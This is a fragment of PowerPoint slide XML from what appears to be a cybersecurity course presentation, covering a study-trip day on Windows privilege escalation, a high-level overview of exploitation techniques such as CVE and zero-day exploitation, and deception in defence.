            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>weak  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>deception!</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3120"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Get </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>executives acceptance of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>risks </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>for types and level</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPts val="3240"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>deception</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>beforehand!</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="116242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0"/>
            <a:ext cx="9144000" cy="1162429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="3429000">
                <a:moveTo>
                  <a:pt x="0" y="3429000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144000" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3429000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920432" y="145287"/>
            <a:ext cx="7303134" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="6000" spc="-5" dirty="0"/>
              <a:t>DAY 1</a:t>
            </a:r>
            <a:endParaRPr sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1324136"/>
            <a:ext cx="9025571" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Day 1 was getting to know each other and what we are to expect from the trip. Additionally we were given files, VMs, notes for the rest of the week.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A lecturer from the Dutch university, Michael </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Gilhespy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>m.gilhespy@hva.nl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> gave an overview of rights escalation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This involved with physical access to the machine, finding access from a standard windows user and then becoming an admin silently.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The whole class had a shared online space to share ideas, tries and success.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The Dutch students came from a wide variety of background and immediately it was evident that they had good knowledge of this subject.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Although this was a little intimidating, all the student were friendly and this put us at ease.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>It was a great learning exercise to see these people using known exploits in the windows system to gain access.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="824425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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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242061" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="3033395">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0"/>
              <a:t>Explo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0"/>
              <a:t>tati</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="0" dirty="0"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78739" y="1166114"/>
            <a:ext cx="8630285" cy="5081270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>warhead </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hits the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>target!</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="440690" indent="-427990">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="275"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="440690" algn="l"/>
                <a:tab pos="441325" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Main exploitation techniques</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-114" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>are:</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPts val="2735"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="325"/>
              </a:spcBef>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Known vulnerabilities (CVE) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploitation: look at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-55" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ShellShock</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285">
              <a:lnSpc>
                <a:spcPts val="2735"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(CVE-2014-6271) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and Heartbleed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-60" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(CVE-2014-0160)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="310"/>
              </a:spcBef>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Zero-day </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>most </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>fancy but the least used</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-95" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>technique!</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1155700" lvl="2" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1155700" algn="l"/>
                <a:tab pos="1156335" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Users are often having what APT actors are looking</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-204" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1155700" lvl="2" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1155700" algn="l"/>
                <a:tab pos="1156335" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Limited</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-90" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>durability</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1155700" lvl="2" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1155700" algn="l"/>
                <a:tab pos="1156335" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Need very strong reason to deploy a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-135" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>0-day</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="295"/>
              </a:spcBef>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Human</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1155700" lvl="2" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1155700" algn="l"/>
                <a:tab pos="1156335" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>An always available</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-120" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>0-day!</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="250"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>This is the second best point to detect</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-125" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>attackers!</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2920"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Missing adversaries in this stage would </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>make </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>detection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-155" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>very  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>difficult </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>later</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-65" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>on!</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>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3429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46989" y="3765169"/>
            <a:ext cx="8725535" cy="1108075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Weaponization, Delivery and Exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="744220" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Practice</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4762" y="0"/>
            <a:ext cx="9153525" cy="3509962"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
